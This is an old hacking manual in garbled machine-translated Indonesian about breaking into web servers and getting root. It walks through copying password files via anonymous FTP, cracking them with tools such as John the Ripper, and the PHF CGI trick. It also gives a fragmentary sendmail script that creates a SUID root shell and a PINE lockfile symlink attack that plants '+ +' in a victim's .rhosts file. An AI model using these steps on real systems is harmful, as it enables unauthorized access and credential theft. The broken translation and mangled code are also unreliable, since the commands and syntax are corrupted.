Hacking Webpage
Hacking Webpage
panduan
Well Psychotic menulis salah satu yang paling bermanfaat unix file teks di dunia maya tetapi dengan
mail yang kita
diterima setelah rilis halaman 36 kami yang terkenal Unix Alkitab kita menyadari bahwa unix ini bukan
untuk semua orang begitu
kami memutuskan bahwa kita harus menulis pada aspek lain dari hacking ..... Virtual Circuit dan bangga
Psychotic release, "Hacking Halaman Web Dengan beberapa Teknik lain." Kita akan membahas
beberapa berbagai cara hacking halaman Web dan mendapatkan akar. Kami juga akan mewawancarai
dan pertanyaan REAL hacker lainnya di pelajaran. Mendapatkan Password Melalui FTP File Ok juga
salah satu cara termudah mendapatkan akses superuser adalah melalui anonymous ftp akses ke web.
Pertama anda perlu belajar sedikit tentang file password ...
TomJones: p5Y (h0tiC: 1229:20: Tom Jones,: / usr / orang / tomjones: / bin / csh BBob:
EUyd5XAAtv2dA: 1129:20: Billy Bob: / usr / orang / bbob: / bin / csh Ini merupakan contoh password
file yang terenkripsi. The Superuser adalah bagian yang memberikan anda root. Itulah bagian utama
dari file.
ftp:x:202:102:Anonymous ftp:/u1/ftp:
Ini adalah contoh lain dari file password, hanya yang satu ini memiliki satu perbedaan kecil, itu gelap.
Shadowed file password tidak membiarkan Anda melihat atau menyalin kata sandi terenkripsi yang
sebenarnya. Hal ini menyebabkan masalah untuk memasukkan sandi pembuat kerupuk dan kamus
(keduanya dijelaskan nanti dalam teks). Di bawah ini adalah lain
nuucp: x :9:9:0000-uucp (0000): / var / spool / uucppublic: / usr / lib / uucp / uucico
webmastr: x: 53:53: WWW Admin: / export / home / webmastr: / usr / bin / csh
Shadowed password file memiliki "x" di tempat password atau kadang-kadang mereka menyamar
sebagai
* Juga.
Sekarang Anda tahu sedikit lebih banyak tentang apa yang sebenarnya file password Sepertinya Anda
harus dapat
mengidentifikasi dienkripsi normal pw dari file pw gelap. Kita sekarang dapat melanjutkan untuk
berbicara tentang bagaimana untuk memecahkannya.
Cracking file password tidak serumit itu akan tampak, walaupun file sistem bervariasi dari sistem.
1.The langkah pertama yang akan Anda ambil adalah untuk men-download atau menyalin file. 2.
Langkah kedua adalah untuk menemukan
password cracker dan dictionary maker. Meskipun hampir tidak mungkin untuk menemukan kerupuk
yang baik di sana
adalah beberapa yang ok di luar sana. Saya sarankan Anda mencari Cracker Jack, John the Ripper, Brute
Force
Cracker, atau Jack the Ripper. Sekarang untuk dictionary maker atau dictionary file ... Ketika Anda mulai
retak
prog Anda akan diminta untuk mencari file password. Itu tempat pembuat kamus masuk Anda dapat
download salah satu dari hampir setiap halaman hacker di net. Seorang pembuat kamus menemukan
semua surat yang mungkin
kombinasi dengan alfabet yang Anda pilih (ASCII, topi, huruf kecil, dan angka surat juga mungkin
ditambahkan). Kami akan merilis pasword kita file ke publik segera, itu akan disebut, Psychotic Candy,
"The
Perfect Drug. "Sejauh yang kami tahu itu akan menjadi salah satu yang terbesar di sirkulasi. 3. Anda
kemudian mulai mendaki
Yah aku tidak yakin apakah aku harus menyertakan bagian ini karena fakta bahwa semua orang sudah
tahu itu dan
kebanyakan server sudah mengetahui tentang bug dan fixed it. Tapi karena saya telah mengajukan
pertanyaan
tentang PHF saya memutuskan untuk memasukkannya.
The PHF Teknik sejauh ini merupakan cara termudah untuk mendapatkan file password (meskipun
tidak bekerja 95% dari
waktu). Tetapi untuk melakukan PHF semua yang Anda lakukan adalah membuka browser dan ketik
link berikut ini:
Anda mengganti webpage_goes_here dengan domain. Jadi, jika Anda mencoba untuk mendapatkan file
pw
dan hanya itu! Anda hanya duduk dan salin file (jika bekerja).
Yah memanfaatkan adalah cara terbaik untuk halaman web hacking, tetapi mereka juga lebih rumit
kemudian hacking
melalui ftp atau menggunakan PHF. Sebelum Anda dapat setup suatu mengeksploitasi Anda harus
terlebih dahulu memiliki proggie telnet, ada
banyak klien yang berbeda Anda dapat saja melakukan netsearch dan menemukan semua yang anda
butuhkan.
Itu terbaik untuk mendapatkan account dengan target Anda (jika mungkin) dan melihat Glitches dari
dalam ke luar. Exploits
mengekspos kesalahan atau bug dalam sistem dan biasanya memungkinkan Anda untuk mendapatkan
akses root. Ada banyak
eksploitasi sekitar dan Anda dapat melihat masing-masing secara terpisah. Aku akan daftar beberapa di
bawah ini tapi daftar eksploitasi adalah
habisnya.
Ini menciptakan program SUID / tmp / x yang memanggil shell sebagai root. Ini adalah bagaimana anda
mengaturnya:
# include
main ()
(
)
_EOF_
#
main ()
(
execl ( "/ usr / lib / sendmail", "/ tmp / smtpd", 0);
)
_EOF_
#
cat <<_EOF_> / tmp / smtpd.c
main ()
(
setuid (0); setgid (0);
)
_EOF_
#
#
#
/ tmp / spawnfish
membunuh-HUP `/ usr / UCB / ps-ax | grep / tmp / smtpd | grep-v grep | sed s /" []*"// | cut-d ""-f1 `
rm / tmp / spawnfish.c / tmp / spawnfish / tmp / smtpd.c / tmp / smtpd / tmp / xc
sleep 5
/ tmp / x
fi
dan sekarang pada mengeksploitasi lain. Aku akan menampilkan mengeksploitasi pinus melalui linux.
Dengan mengamati
tabel proses dengan ps untuk melihat mana pengguna sedang menjalankan PINUS, seseorang dapat
melakukan ls di / tmp / untuk mengumpulkan
Lockfile nama-nama bagi setiap pengguna. Melihat tabel sekali lagi proses sekarang akan
mengungkapkan ketika setiap pengguna berhenti
PINE atau kehabisan pesan yang belum dibaca dalam INBOX, secara efektif menghapus Lockfile masing-
masing.
Menciptakan symlink dari / tmp / .hamors_lockfile ke ~ hamors / .rhosts (untuk contoh umum) akan
menyebabkan PINE membuat ~ hamors / .rhosts sebagai file 666 dengan PINE proses id itu sebagai
isinya. Satu mungkin sekarang
hanya melakukan echo "+ +"> / tmp / .hamors_lockfile, lalu rm / tmp / .hamors_lockfile.